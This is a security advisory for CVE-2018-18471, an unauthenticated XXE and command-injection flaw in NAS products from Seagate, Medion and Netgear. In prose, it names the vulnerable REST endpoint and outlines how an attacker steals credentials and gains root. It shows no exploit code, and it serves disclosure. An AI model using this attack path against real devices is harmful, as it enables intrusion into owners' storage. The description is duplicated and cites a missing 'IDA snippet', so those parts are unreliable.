Privilege escalation in NETGEAR products - CVE-2018-18471
Published: October 22, 2018 / Updated: October 22, 2018
Vulnerability identifier: #VU15459
CSH Severity: High
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:N/SA:N/E:U/U:Amber
CVE-ID: CVE-2018-18471
CWE-ID: CWE-611
Exploitation vector: Remote access
Exploit availability:
No public exploit available
Vendor: Seagate
Medion
NETGEAR
Medion
NETGEAR
Affected software:
Seagate GoFlex Home
Medion LifeCloud NAS
Netgear Stora
Seagate GoFlex Home
Medion LifeCloud NAS
Netgear Stora
Detailed vulnerability description
The vulnerability allows a remote attacker to compromise vulnerable system.
The weakness exists due to most of the API endpoints and the web interface were accessible without authentication while one of the endpoints in the REST API interface is located at /api/2.0/rest/aggregator/xml which loads xml data from POST data. A remote attacker cause the xml parser to make a request to the server at 192.168.56.1 for the file XXE_CHECK, get usernames and passwords,
cause the daemon to skip over junk data until it finds the string as shown in the IDA snippet below and inject arbitrary commands and execute arbitrary code with root privileges.
The weakness exists due to most of the API endpoints and the web interface were accessible without authentication while one of the endpoints in the REST API interface is located at /api/2.0/rest/aggregator/xml which loads xml data from POST data. A remote attacker cause the xml parser to make a request to the server at 192.168.56.1 for the file XXE_CHECK, get usernames and passwords,
cause the daemon to skip over junk data until it finds the string as shown in the IDA snippet below and inject arbitrary commands and execute arbitrary code with root privileges.
How to mitigate CVE-2018-18471
Cybersecurity Help is currently unaware of any solutions addressing the vulnerability.